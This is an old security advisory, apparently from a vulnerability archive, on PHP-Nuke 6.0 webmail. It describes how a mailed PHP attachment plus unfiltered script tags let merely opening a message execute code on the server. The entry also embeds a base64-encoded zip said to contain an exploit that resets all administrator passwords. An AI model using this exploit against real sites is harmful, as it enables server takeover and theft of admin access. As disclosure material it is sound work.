|
COMMAND PHP-Nuke code execution and XSS vulnerabilities SYSTEMS AFFECTED PHP-Nuke 6.0 PROBLEM Thanks to Ulf Harnhammar [ulfh@update.uu.se] advisory : --snip-- PHP-Nuke has got a web mail system, and it stores attachments under their real file names in a directory where anyone can surf to them. There is nothing in the code that stops active content, such as PHP scripts, from being stored in that directory. There is also no warning against this in the program's documentation. As a result, any attacker can execute any PHP script on the web server. The attacker first sends the script as an attachment to any user who will read that message in PHP-Nuke's web mail system. The attacker then waits for the user to open the message, and finally the attacker just surfs to a predictable WWW location. The user doesn't even have to open the attachment, just the mail that it comes in. As a bonus, the web mail system also has a Cross-Site Scripting vulnerability. It doesn't remove <script> tags in HTML based e-mail messages. When we combine the two vulnerabilities, we find that it is possible to construct an e-mail message that will automatically execute an attached PHP script when an unsuspecting user opens that message! This is very bad, as PHP scripts can access files, databases and network resources. They can for instance store a C program in some temporary location, compile it and execute it. To make things even worse, the availability of anonymous remailers and the fact that the PHP script will be accessed from the victim's IP number and not the attacker's makes the attacker pretty anonymous. --snap-- EXPLOIT: ======== I have also attached an exploit for this issue, which changes all administrator passwords on the PHP-Nuke system to "ulf". The attacker simply sends an HTML mail with the contents of my xss.html file as the *mail body* and my adminexploit.php file as an attachment. As soon as the victim opens the mail, the script is executed. ---293465837-781401444-1040052962=:9852 Content-Type: APPLICATION/zip; name="php-nuke_webmail.zip" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.4.21.0212161636020.9852@Tempo.Update.UU.SE> Content-Description: Content-Disposition: attachment; filename="php-nuke_webmail.zip" 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 ---293465837-781401444-1040052962=:9852-- SOLUTION No official patch yet